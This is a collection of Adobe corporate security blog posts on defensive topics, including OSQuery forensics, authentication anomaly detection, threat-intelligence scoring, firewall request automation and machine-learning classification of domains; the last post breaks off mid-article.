Quantcast
Channel: Ongoing Research – Security @ Adobe

Adobe Supports OpenID RISC Integration with Google Social Authentication

$
0
0

Today is Safer Internet Day, and the slogan is, “together for a better Internet,” calling for stakeholders to join forces and help create a safer Internet. Thus, we wanted to share the details on our recent efforts with Google. Adobe and Google are working together to develop and implement the OpenID Risk and Incident Sharing and Coordination (RISC) specifications to help protect our users. One of the key objectives of the OpenID RISC working group is to develop standards designed to protect third-party accounts (such as Google Social authentication) when they are used to sign-in to other services (also known as “social sign-on” or “SSO”).

Adobe supports multiple third-party SSO authentication methods through its identity management services, including Google Social authentication, for several of its products, including Adobe Creative Cloud.

This collaboration enables sharing of real-time security notifications that can help proactively protect Adobe user data if another SSO provider, like Google, experiences a security incident impacting their user accounts. This enablement is just one example of the ongoing efforts Adobe is undertaking with our industry partners and the broader security community to better protect Adobe users and their data.

Prior to this effort, if a third-party account, such as a Google Social account, was in jeopardy, all services that permitted users access using that third party SSO credential could be vulnerable until they were notified by the third-party providers. Open ID RISC is a standards-based effort that aims to reduce this risk by providing connected services (like Adobe) with immediate notifications from third-party SSO providers about compromised accounts. This helps companies, like Adobe, to quickly address the reported issue and secure its users accounts and data.

In support of OpenID RISC, Adobe updated its SSO authentication integration to enable real-time notifications from Google Social authentication services–demonstrating its commitment to enhanced user account protection efforts. With this integration, Adobe receives notifications of major changes to Google accounts (e.g. session revokes, account disabled, etc.) and acts to secure the user’s account (e.g. ending currently open sessions).

Adobe is committed to continuing its work with the OpenID RISC working group on this standard and promoting it as a solution for more secure integration with third-party identity providers. Adobe’s work with our industry partners, like Google, helps us provide a more seamless user experience while helping protect our user’s accounts as part of our continuous efforts to improve the overall security of our products and services.

John Trammel
Principal Scientist, Identity Services

Cristian Aurel Opincaru
Manager, Software Development, Identity Services


Digital Forensics and Incident Response Using OSQuery

$
0
0

Understanding the anatomy of a potential incident can be one of the most challenging tasks that an incident response team faces, especially in the increasingly complex, cloud computing environments most organizations have today. But even the most sophisticated hacker can leave behind footprints that can help incident responders piece together what happened to try and prevent a repeat. While using a forensics tool to extract artifacts from endpoint memory is the typically the most comprehensive method of reconstructing a potential incident, it’s also the most time- and resource-intensive. And when responding to a security incident, time is of the essence, particularly with the increasingly stringent data protection requirements set by numerous government regulations and industry standards.

Detecting and containing a security incident is no easy feat in the simplest of network architectures, and the more complex the network, the more difficult detection becomes. Dwell time (the time between initial compromise and detection) can vary from a few hours to several months.

To improve overall data security and minimize the risk of security incidents, organizations need to implement a proactive threat detection plan in addition to a reactive incident response activity. But where to start? It is often like searching for the proverbial needle in a haystack, but certain categories of artifacts can provide the initial insights and can be extremely relevant when performing a live disk analysis of an endpoint.

Generally, the time and resources required to gather and analyze relevant artifacts from multiple machines across an enterprise simply doesn’t scale in large cloud computing environments. To address this scalability problem, the Adobe security team is working on a new approach to digital forensics and incident response (DFIR) that’s quick and cost-effective based on OSQuery – an open source tool that you might already have in your endpoint monitoring toolkit.

The OSQuery framework exposes the operating system of an endpoint as a relational database, against which you can run standard SQL queries to find specific artifacts about the system, such as running processes, logged-in users, open network sockets, bash history, listening ports, process trees, and even Docker containers. Each artifact type gets its own table within the database. Because it uses industry-standard SQL, the query language employed by OSQuery is generic across operating system platforms. While this is a huge plus, don’t mistake it for an alternative to using a real-time response EDR tool.

OSQuery is well-suited to two fundamental DFIR use cases, each of which organizations likely encounter every day. The first use case focuses on forensic data collection for analysis and large-scale threat detection across the enterprise. In this scenario, organizations run OSQuery in interactive mode (osqueryi) from the command line and use ad-hoc SQL queries to collect data during a forensic investigation. For example, you suspect that an endpoint has been infected, but you don’t want to push the button on your forensics tool right away or maybe you’re hesitant to run an artifact script on a compromised endpoint. Instead, you can create a set of queries in OSQuery that are tuned for a forensic investigation and collect the relevant artifacts from that particular endpoint, from broad queries that return all processes running or new services that have been installed as scheduled jobs to more granular searches to detect what may have been loaded by a specific malicious process. Interactive mode is also useful for testing queries before large-scale deployment.

Alternatively, OSQuery is also extremely useful for threat hunting in your enterprise. In this scenario, you install OSQuery as a service (or in daemon mode) and run scheduled queries for periodic data collection. This enables you to determine baseline behavior and then identify outliers that might indicate a potential security threat. Daemon mode, osqueryd, is used for large-scale deployment of queries across your enterprise after you’ve tested them in osqueryi.

The high-level architecture of deployment is shown in the figures below – (1) the osquery agent checks in, (2) the TLS endpoint responds with a query and (3) osquery replies back with the results.

Fleet from Kolide is an Open Source Query Manager through which queries can be deployed via query packs and run across your fleet. The output can be sent to a SIEM or Log Aggregation Platform for further investigation and/or threat hunting.

OSQuery architecture

Using Kolide

Let’s talk about a potential attack scenario involving malicious cryptomining.

The attacker compromises an instance with stolen or default credentials. The attacker also creates a new user account and deletes the legitimate users and blocks legitimate access. At this point, the attacker might spin up more instances. Eventually the attacker installs and starts the Miner. The miner establishes connection to its pool. The attacker might establish persistence and propagate laterally in the network.

Here’s the scenario that we emulated in our sandbox environment.

Sandbox scenario

The detection mechanism in SIEM:

Example in SIEM

While I’ve only touched on its capabilities at a high level, OSQuery can be an ideal solution to help incident response teams to work quickly and at necessary scale when a security incident occurs. Even the stealthiest attacker can leave behind footprints—and the quicker and more accurately you can detect and analyze these footprints, the faster you can determine the scope of the threat and work to contain it.

For more information on Adobe’s scalable approach to DFIR using OSQuery, watch this webinar.

Sohini Mukherjee
Security Analyst, Adobe Security Coordination Center (SCC)

Andres Martinson
Sr. Security Engineer, Experience Cloud

 

Using User Behavior Analytics to Detect Authentication Anomalies

$
0
0

You may think detecting user authentication anomalies is as simple as identifying a red egg in a carton of white ones, but it’s nowhere near that easy. On the other hand, it’s not impossible, especially when you implement user behavior analytics (UBA). In a nutshell, UBA helps detect anomalies in user behavior through a combination of data science, machine learning (ML) algorithms, and AI. When integrated into a company’s overall security procedures, UBA can help security professionals proactively detect potential perimeter issues, suspicious lateral movement, possible insider threats, and other anomalies that may be malicious. At a higher level, UBA enables you to simultaneously strengthen your proactive security efforts and enhance your defensive security solutions. For example, using ML and AI, you can identify activity that, if allowed to continue unabated, might become a full-blown security incident.

Here at Adobe, the Security Intelligence team uses UBA to perform daily anomaly detection in our user authentication logs, which are generated by Okta. We use a custom portal — the Identity & Access Management Portal — to track user interactions and alerts, and we take user feedback into account when weighting anomalies. We added functionality to the IAM portal so users can view their own historical data about their anomalies and how they’ve responded to them. This direct involvement makes it easier for the user see how they are adding value to what we are doing behind the scenes. Plus, most users want to do the right thing security-wise, but they’re often unaware of what the best practice is or they’re making honest mistakes. Engaging the user and making them aware of how their activities might directly affect or impact what could be identified as an anomaly is important in this process.

So, based on user feedback about whether an anomaly is legitimate or malicious, we can adjust the model to weight features appropriately: either that the activity is no longer considered anomalous and we should treat it differently the next time it appears, or that it should be escalated to another team for analysis using an automated workflow. Being able to close the loop and bring the user into the process helps eliminate false positives and improves our overall security efforts.

Now let’s dig deeper into the technical aspects of the anomaly detection and alerts workflow we use at Adobe:

The first step is to pull the logs of all successful authentications in the last 24 hours and filter them according to employee type. This is accomplished via an API call to Okta, which provides a robust, valuable data set that helps us understand what the authentication process or the session might look like for a user. Details about geography, applications they’ve accessed, IP addresses, and such make it easy to come up with a strong methodology for analyzing those events.

Then, we note the features – or detail data – for each successful authentication and add these, along with the Okta logs, to a MongoDB database.

Step 1: Gather Okta logs and groom features of successful authentications

Next, we append the Okta data from the past 24 hours to last six months of historical Okta data for a user in the MongoDB database and run a machine learning algorithm against those data sets, using User Agent String (UAS), country, and app as features. We then use statistical calculations to check if the country in the anomaly is the least count country for the user or if the UAS is least count UAS and we also use travel data to account for international business travel to remove false positives. These anomalies are then added to the MongoDB database. This step in the workflow typically takes 30 minutes to two hours, with an average runtime of one hour.

Step 2: Identify anomalies and remove false positives

Now comes the process of alerting the user and getting their feedback. IAM team pulls all the anomalies in the past 24 hours from the MongoDB database and sends email to each user with all anomaly associated with their username. The user then logs into the IAM portal and either confirms or denies the anomaly, and the MongoDB is updated with the user’s response. If the user responds that he recognizes the login and that it’s legitimate, future anomaly with same parameters will not be escalated to the user for the next 2 weeks. If the user responds otherwise, the anomaly is automatically escalated to the Adobe SCC in the workflow execution. And if the user responds with NOT SURE, the alert is assessed for compromise or better classification by the Security Intelligence team.

Step 3: Alert user and update MongoDB

Now let’s look at some examples of user authentication activities that would trigger various levels of anomalies:

High Severity

  • User travels to a different country and uses new device/browser
  • User attempts to login from a blacklisted country or using a blacklisted UAS

Medium Severity

  • User travels to a different country and uses existing device/browser
  • User logs in from a new device/browser even if in their home country

It is important to note that just because an anomaly is flagged as “high severity” does not mean that it is malicious.

Since implementing UBA within Adobe, we’ve seen a number of business benefits, not the least of which is that our user community is now engaged in the security process. Our password policy now more closely mirrors the latest NIST standards, ending arbitrary password rotation and improving overall security. We have greater visibility into business processes and possible security policy violations, such as an attempt to automate the authentication process using a workflow that hasn’t undergone a security review. We’ve been able to identify a number of previously undetected malicious activities, and we’ve improved other authentication workflows by applying the UBA results, including adaptive authentication based on user/device risk and history.

In conclusion, this project has helped us at Adobe gain valuable insight into possible user behavior anomalies, how to detect them, and how to avoid issues that could trigger a needless reaction. First, sometimes the results of our analytics simply reflected unexpected or poor work processes or policy issues rather than truly malicious activity. Second, ensuring automated and repeatable results takes time. And finally, occasionally legitimate activity will trigger an alert and it’s important to determine, as a company, your acceptable rate of false alarms.

Aron Anderson
Lead, Enterprise Security

Ashwini Cheerla
Security Engineer

Automating the Common Controls Framework

$
0
0

Over the past several years, the Adobe Technology Governance Risk and Compliance (GRC) team has developed and implemented the Common Controls Framework (CCF). The CCF helps various cloud products, services, platforms, and operations achieve and maintain compliance with various security certifications, standards, and regulations such as SOC2, ISO, PCI, FedRAMP and others. The CCF is a foundational framework and backbone to our company-wide security compliance strategy. Not only does it provide the flexibility to quickly adapt to and tackle new certification requirements, but it also helps heighten our information security posture.A few years ago, through our ongoing efforts to support the broader security community, we open-sourced CCF so customers and peers can leverage it to help meet their goals.

The Next Level

As Adobe’s products, services, and platforms grow and expand, CCF must also mature and scale at the same pace. To help enable this scalability, the Adobe Technology GRC team is developing a controls automation platform. This will help CCF to mature further reducing the amount of manual effort needed for the implementation and ongoing maintenance of controls.

In addition, the CCF automation platform will be able to check the operating effectiveness of controls on a near real-time basis. It will also provide immediate alerting and remediation tracking to owners of the controls. The automated CCF checks and alerts will help enable us to identify potential issues early in the audit cycle – helping to reduce the potential risk associated with controls failure.

This CCF automation platform will also include a dashboard that provides Adobe control owners with a comprehensive view of the state of effectiveness of CCF controls along with all the upcoming activities that need to be adhered to maintain the operating effectiveness of the controls.

Scalability

Implementing CCF and managing the framework across Adobe requires working with the growing footprint of services spanning multiple clouds. We also must help these services maintain continuous operational effectiveness of controls. The current process requires that the cloud operations and engineering teams perform periodic compliance validation activities, along with manual extraction of audit evidences/artifacts (e.g. access reviews, business impact assessments, etc.). They then must retain these manual reports to demonstrate the controls’ operating effectiveness. Together these activities can be very time consuming and lack the desired operational efficiency.

The CCF automation platform ingests the logs directly from source systems and performs automated checks against them, thereby reducing the manual effort required by teams. This will bring significant improvement to the operational efficiency and scalability of Adobe’s ongoing compliance certification and attestation process.

The Platform

The CCF automation platform is built on a layered framework that consists of:

  • Visualization layer
  • Application layer
  • Services layer
  • Data layer

When?

CCF is an ongoing journey with various milestones to be achieved, and a continuous pursuit for enhancements. The automation platform is the next level of organic maturity for CCF. Over the next few quarters, we plan to implement and deliver the CCF automation platform for Adobe in a phased manner over multiple releases. Stay tuned for further updates.

Prasant Vadlamudi
Director, Technology GRC

Automating Secure Firewall Change Requests

$
0
0

As many companies transform to multi-cloud environments, managing firewall changes at the speed of development teams can be challenging. Teams across Adobe are constantly evolving cloud services to continue to delight our customers. But one of the major challenges is in helping to ensure that the firewall change requests to support their work happen efficiently and securely. We receive hundreds of access requests each month for access to services. However, manually reviewing each one can be a time-consuming process that comes with the risk of human error. We set out to try and mitigate this potential risk by automating as much of the process as possible.

Defining Requirements and Initial Testing

We started by assigning different levels of risk to various protocols and common design patterns. We knew we needed to automate identification of these protocols and design patterns as well as identify what kind of connections should or should not be permitted based on risk tolerance.

We used Microsoft’s STRIDE threat model to help identify the potential risks with certain requests. Examples of these higher risk activities are:

  • When users did not understand their data flows, they might request large port ranges
  • When users did not understand how stateful firewalls work, they might request reverse traffic access (i.e. from server to client)
  • When systems support legacy insecure protocols like FTP for file transfers, users might request these simply because they are listed in the documentation

We also used a risk assessment matrix to measure the total impact and likelihood of possible threats. If the risk of a request is higher than what is permitted by Adobe’s own established risk management standards, the request would not be approved by the tool.

We then developed a framework using Python scripting to meet these requirements. In the initial testing and acceptance phase, all automated decisions were manually reviewed. Once we were able to determine that automated decisions could be reliably accepted, we then deployed this framework for our lowest risk change requests.

Evolving the Framework

The framework is designed to be extendable so when a new potential risk is identified, it can be folded into the framework quickly. The framework runs on each new change request. We make updates when a new potential risk is identified or there is a specific set of applications to which we should provide more oversight. We regularly review the tool’s decisions to help ensure ongoing accuracy as we scale up usage. We also advise requesters when deployment patterns do not fit automatic approval criteria. We encourage them to consider lower risk options for their deployments. We also remind them that any request must meet all established security standards. Here are some examples of best practices the tool looks for in order to expedite approvals:

  • Specific source hosts provided
  • Specific destination hosts provided
  • Secure transports only are used (HTTPS, SSH, SFTP)
  • Registered services with matching data classification
  • Well-defined logging and monitoring access

Conclusion

We are still developing and evolving this tool in real-time as we gain more knowledge about the patterns in our development teams’ requests. So far, usage of this tool has saved a lot of manual review hours, improved turnaround time for developers that follow established good security development practices and helps reduce the overall risk level associated this very common request for ongoing cloud application development and deployment.

Ben Chinoy
Security Researcher

Jason Joy
Sr. Enterprise Security Engineer

Introducing Tripod: an Open Source Machine Learning Tool

$
0
0

Machine learning (ML) and artificial intelligence (AI) are becoming very useful technologies in cybersecurity. However, before you can model, validate, and visualize security data that will actually be useful, you need to prepare the data properly for input. This can be a difficult and complicated process – something data scientists wrestle with often. More than just traditional data preparation, which includes cleansing the data and de-duping, ML algorithms often require numerical rather than standard text input. The challenge is finding an efficient and accurate way to convert your data to numerical values that can be consumed by the ML model or algorithm.

The Security Intelligence Team within Adobe’s Security Coordination Center uses ML/AI to help more quickly recognize and identify potential threats to Adobe’s infrastructure. In order to keep up with new methods of attack and find potential “needles in the haystack,” we continually run new data models. We also need to make sure that the data prep process is not a hindrance to our efforts.

Tripod is a tool and model for computing latent representations for large sequences. It can be used for several potential applications including:

  • Malicious code detection
  • Sentiment analysis
  • Information/code indexing and retrieval
  • Anomaly Detection/ Unsupervised Learning

Tripod automatically computes latent representations of data in code and logs that ML/AI algorithms can use. By implementing three different methodologies—self-attention, global style tokens (GST), and “memory-based” representations—Tripod can more quickly turn traditional text-based data into numerical input that ML/AI algorithms can ingest.

Here are a few examples of how we use Tripod to help in our efforts here at Adobe.

By feeding both “good” JavaScript and “bad” JavaScript code into Tripod, we can get a dataset that from which we can determine a single “classifier” – an attribute that distinguishes the malicious code – which we use to “train” the ML algorithm. Without Tripod, this process can be time-consuming and tedious.

Tripod can also help uncover anomalous code, which is one of the most common ways malicious attacks infiltrate systems. After running raw log data through Tripod, we get a vectorized dataset that is easily ingested by the ML algorithm.

Tripod can also assist with log analysis. From a logging perspective, anomalies are events that occur very rarely in a dataset. Malicious events are similar – if infrastructure is well-secured, they are infrequent when compared to mainstream events. The direct approach is to identify the anomalies in a dataset and then search for malicious activities in this subset of data. For log sources that can generate up to several million events each hour, Tripod can help more quickly identify the subset of events that may be worth investigation.

Data is critical to machine learning and the Tripod project can help you get more useful information quickly from complex datasets. Machine learning through tools like Tripod can help you find the answers you need to respond to potential issues and threats more quickly. You can download Tripod for yourself today from Adobe’s GitHub repository.

Tiberiu Boros
Data Scientist & Machine Learning Engineer

Andrei Cotaie
Sr. Security Engineer

Rethinking Threat Intelligence with the LEAD Framework

$
0
0

Threat intelligence has been a key component of our detection process for many years. We created the LEAD threat intelligence framework to help security personnel make sense of the threat intelligence data we collect everyday. This framework is based on a unique maturity model that combines machine learning (ML) with automation and security orchestration to better deliver actionable and relevant threat intelligence. What does that really mean?

We broke the threat intelligence process down into four fundamental steps. In each step, the threat intelligence must be:

  1. ReLevant
  2. Efficient
  3. Analyst-driven
  4. Deliverable

Within each step, two elements combine to produce an actionable result. Let’s take a deep dive into each step.

ReLevant

To make threat intelligence relevant, you first need to create a threat profile. A threat profile includes what infrastructure you are trying to defend (e.g., enterprise network, servers, mobile devices, POS systems, and IoT) as well as from whom you are defending that infrastructure. Understanding the potential attacker/s motives is important because the various types of attackers have different degrees of sophistication and ability to mount complex attacks. For example, attacks from script kiddies and scammers are typically not very complex but those more advanced actors can be moderately to very complex. The attacker type then informs which threat intelligence feeds and sources, to ingest. Likewise, the infrastructure you are trying to defend also helps you pinpoint relevant threat intelligence feeds and define specific filters for them.

Now that you have your threat profile, you need to define the threat intelligence program requirements. You can think of this as defining what threats you’re potentially facing and what tools you need to help combat these threats.

To help do this, we created a unique threat intelligence maturity model, which maps to the most common maturity model levels used in the cybersecurity industry. This commonality enables fluid transition to the LEAD framework from other maturity models or frameworks.

Here is a more detailed explanation: 

There are commonly two types of threat intelligence programs: Early Stage programs focus primarily on Indicators of Compromise (IoC), which are the traditional tactical – and often times reactive – indicators used in threat detection. In contrast, Mature Stage programs focus on behavioral indicators or Indicators of Attack (IoA), which is a more proactive way of determining the intent of the bad actors.

Once you’ve defined whether you have an early or mature stage threat intelligence program, you can make better decisions about securing the right tools  for your program, helping ensure that you invest in the tools that will support your program rather than wasting money on a tool that looks sexy but doesn’t solve the problems you face in your stage. For example, an early stage program will detect cyber-threats using atomic indicators (e.g., IP addresses, file hashes, email addresses, URL addresses) in an automated manner.  These indicators will come from threat intelligence sharing groups or OSINT (open source intelligence) and the data needs to be in a standardized format in order for the automation to be efficient. Which leads me to the second step.

Efficient

The second step in the LEAD framework is focused on making your threat intelligence efficient. How do you do that? You score and categorize the data.

The LEAD framework uses a scoring matrix that includes five different properties to assist in determining the importance of each piece of data:

  1. Indicator Type – This is the information that tells you where the attack is coming from: IP address, domain name, file path, email address, URL, or file hash.
  2. Threat Intelligence (TI) Source or Feed – The reliability and accuracy of TI data is often related to the source of the threat, whether that’s OSINT, TI sharing groups, paid vendors, or internal threat intelligence.
  3. Threat Source (a.k.a, The Adversary) – Some threat actors and malware families target specific sectors and infrastructure, which makes them rate higher on the threat scale. These sources include script kiddies, scammers, hacktivists, organized crimes, and nation/state sponsors.
  4. Threat Context – One of the most important factors influencing the score, threat context describes how the attack or threat is being carried out. For example, is it a malware threat, a MITRE attack, a SQL injection, or a cyber-kill chain? Context is also commonly known as TTPs: techniques, tactics, and procedures.
  5. Data Retention – Is the threat intel data historical or new?

Here is an example of a basic threat profile:

Indicator: 1.1.1.1
Indicator Type: IP Address
Threat Intelligence Source: OSINT (Open source intelligence)
Threat Context: Targets MacOS, targets only EU companies, communicating over port 80, It is used only for exfiltrating data (Cyber Kill Chain Phase: Exfiltration)
Data Retention: Last used two months ago

We then use this information to assign a positive or negative score to each property based on the overall threat profile. So, for the above example, the threat score might look like this:

Indicator Type:

IP                     +1
Domain           +2
File Hash         +2
Credit card data+3
Email               +3

TI Data Source:

OSINT              +1
TI sharing        +1
Paid feed         +2
Internal TI       +3

Threat Attribution:

Organized crime +3
Scammers         +2

Context:

Infection Vector – Phishing    +2
Targeted Sector – E-commerce  +4
Targeted Region – Europe.                  +4
Targeted OS – Windows                     +2

Data Retention:

Indicators last seen < 3 months          +2
Indicators last seen > 3 months          -2

Once scored, each threat is then categorized by use case and stakeholder. This helps determine the threat level and whether the threat is currently active, expired, or has previously resulted in a false positive. In this example, incoming IP traffic from OSINT that is older than three months will have a lower score than a threat to credit card information from e-commerce companies that you found out about from a paid TI source.

Analyst-driven

In this step, threat intelligence becomes dynamic rather than static by using feedback from analysts and other stakeholders to filter, categorize, and re-evaluate the threat intelligence data from both internal and external feeds. Using this analyst feedback loop, the TI data is dynamic or, in other words, self-tuning. To further improve the data, we use Machine Learning (ML) to process and Natural Language Processing (NLP) to review the analysts’ feedback and create keywords and tags that, with the help of orchestration, enable us to bring back the data into the framework and further improve scoring and categorization.

Because the feedback provided by the analysts and/or stakeholders is typically supplied in free text format and with multiple data structures, the LEAD framework uses Machine Learning, specifically Natural Language Processing, to analyze the feedback and extract keywords. These keywords are then used to inform the context property of the scoring matrix above. Based on these attributes, the score of a piece of threat intelligence data will increase or decrease. The entire process requires orchestrating multiple automations, resulting in dynamic, or self-tuning, threat intelligence data.

Deliverable

Using standardized data formats is important in delivering relevant and actionable TI data most efficiently. Some important factors to consider include:

  • Flexible API — Exposing all TI data attributes through an API helps create a flawless automation process between the TI data and its consumers/stakeholders.
  • STIX 2.0/JSON data structure — Contributing and ingesting TI becomes a lot easier with STIX. All aspects of suspicion, compromise, and attribution can be represented clearly with objects and descriptive relationships. STIX information can be visually represented for an analyst or stored as JSON to be quickly machine-readable. STIX’s openness allows for integration into existing tools and products or utilized for your specific analyst or network needs.

Metrics

The last step in the LEAD framework generates metrics that help measure the success of the TI program and justify its implementation to management. You should always choose metrics over which you have direct control. While you can’t control the number of threat actors or actual threats you might encounter in a given period, you can control how many services and applications you have that are currently able to collect useful intelligence about possible attacks against them. This keeps focus on a manageable goal (e.g., broad coverage) versus a goal with too many external uncontrollable factors.

In summary, effective metrics should be:

  • Audience-specific
  • Related to how and where TI is used, e.g., did it help prevent or detect a specific threat?
  • Not be actor-driven

Conclusion

We created the LEAD threat intelligence framework to help security personnel make sense of the volumes of threat intelligence data we collect every day, aiding the detection of the most critical threats and the speed of remediation. Based on a unique maturity model that combines machine learning with automation and security orchestration, the LEAD framework uses a four-step process to deliver actionable and relevant threat intelligence to our security personnel, helping ensure the security of our infrastructure—and your data.

Filip Stojkovski
Manager, Threat Intelligence

Mapping Your Way Through Application Security Obstacles

$
0
0

As a security researcher, it is always important to stay current and explore new technologies. Graph databases have been around for a while, but I never had a use case to dive into them until recently. This blog series will cover what I learned from a recent exploration of how they can be leveraged for application security within large organizations.

John Lambert, Distinguished Engineer, Microsoft Threat Intelligence Center, is often quoted for saying, “Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.” This was one of the concepts that had originally hooked me on the idea of exploring graphs in our tooling. There have been many examples of graph databases used to solve problems in network security, spam and fraud detection, along with cloud configuration issues. These include open source tools such as Bloodhound AD, Grapl, and CloudMapper.  There are also non-security use cases found within the developer world such as New Relic’s, “Service Maps”. Graphs have even been argued as a necessary component to move machine learning to the next level. However, there are not many examples specific to web application security.

Graphs have proven useful to desktop application security for many years. Reverse engineers rely heavily on the visual call graph that tools like IDA Pro provide in order to understand the flow of the application. For web services, the closest example is that application security researchers have relied on service diagrams at the top of every threat model. The challenge is that these static, threat model diagrams are limited both in detail and keeping up with changing architectures. When threat modeling first began, architecture diagrams had a clear linear flow and often looked like this:

Today, micro-services have created hub-and-spoke models of multiple inputs and outputs. For large micro-service organizations, the network diagrams now look like this:

[Source: https://divante.com/blog/10-companies-that-implemented-the-microservice-architecture-and-paved-the-way-for-others/]

Different sources have quoted Netflix as having approximately 500-700 micro-services powering their company. This exceeds what humans can reasonably track manually with simple static diagrams.

Therefore, in order to track data through a complex system, we need more than static pictures of the conceptual representation of the service. We need the ability to dynamically interact with the graph through code. As John Lambert said in his blog, “Defenders should take a lesson from how attackers come to understand the graph. Attackers study the infrastructure as it is—not as an inaccurate mental model, viewed from an incomplete asset inventory system, or a dated network diagram. Manage from reality because that’s the prepared Defenders Mindset.” In the world of micro-services, the risk that an application diagram quickly becomes dated is significant.

Not only it is necessary to have a dynamic graph of the application flow that can be queried via code, it is also important to relate the meta information about the application that is distributed across different sources. If you work with a small team, this may not be complicated because there is one source repo and one production environment. You can take advantage of commercial products that can link static and dynamic analysis in these simplified environments.

Working within a large company, you will have hundreds of services, written in dozens of languages, and distributed across different cloud providers plus traditional data centers and CDNs. There is no single vendor tool that handles that complexity.  The ability to identify an issue in source code, determine whether it is in production, and scan its environment all via code within a scalable infrastructure is critical. In order to accomplish that goal, organizations need to be able to programmatically link each team with their GitHub location, domain name, Jira queue, security tools, etc. in addition, to dynamically represent how the services are connected to better understand data flow.

By collecting the metadata, organizations can both map the data flow and make it more robust. A traditional application dataflow diagram will simply show a box labeled with the name of the component. An enhanced data flow diagram could make it possible to see its GitHub location, the security tools tracking it, and other relevant information. This can make working with a development team much more efficient.

To make this possible, organizations need to ingest information from multiple sources into one database. This style of approach was previously in the Marinus project where domain information was pulled from multiple sources and correlated in a Mongo database. SQL databases tend to be more difficult to use when correlating data from disparate sources since there is no shared primary key. For this graph project, MongoDB could only be used as a temporary cache for the data since MongoDB is mostly designed to store data as independent records. Organizations should know how and why the data relates. Using table joins within an SQL database to relate the data assumes a consistent method of connecting the information. Since each team will have their data stored across a different subset of tools, there is no guarantee that the way in which the data is connected will be consistent.

This is where graph databases become the preferred approach. With graphs, data can be connected for any reason, between any two vertices, for whatever reason you deem appropriate for those two vertices. When performing a query, you can ask whether two pieces of information are related regardless of the reason why they are related or how many degrees of separation exist between the two pieces of information. Graph databases provide a flexible way to search across complex relationships.

Even in the very early stages of the project, mappings were created with only a small amount of code. Below is a screenshot from the first prototyping of the tool. This diagram does not show the data flow between services. However, this diagram from the initial prototype does show the ability to connect metadata information from many different sources into a single, linked representation. This tool first ingested data from a dozen different, disparate sources within the company and stored it in the graph. Next, the tool was able to identify that at least four of those systems had information for the service that I queried, and was able to produce a graph that linked together the metadata data for that service:

Within this graph, organizations can now tie together the service name, GitHub location, AWS account, domain name, and contact information. This information alone is enough to allow us to complete the flow between finding a static analysis issue, testing for the issue on the domain where it is deployed, and filing an issue if the service is vulnerable. Most importantly, this can be done via code without any contextual knowledge of the service. This tool allows testing at scale across a wide range of services without pre-configuring data for each one.

Graphs aren’t the right tool for every problem, but they can be a valuable tool. In future blogs, we will discuss the technology stack that used to build this project and the lessons that were learned while building it. We will also provide more complex examples of the different ways in which data can be linked together for different goals.

Peleus Uhley
Principal Scientist


Using Machine Learning to More Quickly Evaluate the Threat Level of External Domains

$
0
0

Most antivirus (AV) software is designed for home/personal use. It can cover common scenarios. However, corporate networks must deal with preventing potential targeted attacks. These “attacks”? are oriented at confusing the security policy and standard AV vendors. Relying solely on external vendors to provide good security measures likely means ignoring the profiles of attackers that target your specific infrastructure. Also, the size of the internal network is directly proportional to the number of artifacts that need to be checked. This raises the issue of potential API limitations and scanning capacity when relying solely on AV providers. Thus, a complete security solution must rely on both external vendors and on the threat-specific model for your own company. 

Our scope

Whether we are talking about unsuspecting users visiting malicious websites or being tricked into clicking malicious links in phishing emails, innocent user behaviors are a common vector for attacks. Attackers are also getting smarter by more directly monitoring these types of interactions to determine how the malicious attempts can be made more effective. Depending on the size network, an organization could potentially get several hundreds of thousands of unique domains that are accessed on a daily basis. Luckily, you don’t have to check all of them – you can take an incremental approach of only checking newly observed ones. Of course, a resource that was previously vetted could become compromised over time, but, with a healthy cache, you can re-add them into the cycle and check them periodically. This could potentially keep incrementing the number of domains you have to check in the long run, but keep in mind the dynamic behavior of browsing: some of the domains are only accessed once (the user never returns), other’s become trending and are frequently seen (you would expect that their owners also take security seriously and help make sure that they are not compromised), and domains that were trending at some point could  go back to anonymity and are not accessed anymore. In short, you may have to scale at some point, but it’s going to take a while before you get to that point.

But what are newly observed domains all about? For most of the AV vendors and passive DNS companies, newly observed domains represent web entities that were registered recently – a couple of days or maybe a couple of hours ago. This information might be an indicator that the domain might be worth investigating.

For the Adobe security team, NODs (newly observed domains) represent web resources that were accessed from Adobe infrastructure or from Adobe owned devices and that were never seen before in the Adobe logs. This means we are looking for NODs from an Adobe perspective and not from a broader web perspective. Now, even if you only focus on newly observed domains, you could still end up with tens of thousands per day. This is just how it is. This domain number is still likely to go beyond most API limitations of queries per day. Needless to say, you need a quicker way of reducing the number of domains scanned.

Generating NODs

Let us take a quick look at what NODs represent. As we mentioned we are interested in seeing what new domains are contacted daily. We start this approach by looking through a variety of logs sources, like proxy, DNS, or EDR generated logs.

In order to initialize the process, we take the logs for a large period of time (1 month) and make a statistic of all domains contacted in this period that are not a part of the Cisco Umbrella [CL1] “Top 1 Million” dataset. The result is going to be our initializer.

Then, the next day we will check all the domains that were contacted (using the same log sources) and that they are not in the Cisco Top 1 million, or in the data collected previously. That generates the first day of NODs. We add those results to the initializer and do the same approach the next day.

This way, we have daily a list of all the unique newly observed domains, from an Adobe perspective.

Knowing versus guessing

There are two broad categories of methods aimed at detecting if an item (domain, binary, script, etc.) represents a potential threat or not: signature-based methods and heuristic-based methods. Signature-based methods require prior identification and labeling of a potential threat, followed by hashing or signature creation. These types of methods are useful for accurately detecting well-established threats and they are less prone to error. However, emerging threats are best addressed by heuristic methods. These look for common threat behavioral patterns or try to detect anomalies in the way software/scripts/sites work.

Heuristic techniques employ either hand-crafted rules or automatically generated rules/patterns. This, in turn, can be supported by machine learning methods. Whatever the case, heuristic methods have a higher chance of generating false-positives – mainly because of the blurred line between what is normal and what is abnormal software behavior. This includes websites that send data to third party entities, text-editors editing registry keys and accessing low-level system (kernel) functions, and plugins with a common behavior of hooking or loading libraries and sometimes even overwriting standard function calls. Thus, unless you can afford to rely solely onsecurity policies that could potentially slow down the process, heuristically reported artifacts must be manually curated. 

This brings us to another issue regarding the manual testing capacity of any company. The number of investigations that can be carried out in a specific timeframe is relatively small compared to the number of false positives generated by many heuristic methods. With just one source of truth from any open-source (OS) or commercial vendor is likely to overflow the work capacity of the security analyst team. To help mitigate this issue, we set out to create our own detection pipeline for the newly observed domains. This has the goal of reducing the number of false-positives and reported artifacts to a more manageable number. 

The solution involves three machine learning methods that independently assess if an artifact (in our case domain) is potentially malicious or not based on linearly independent features extracted from various vendors and OS data. Figure 1 shows the generic architecture of our system.

[NOTE: All data shown in this article is hypothetical training data that was used to prove the model and application.]

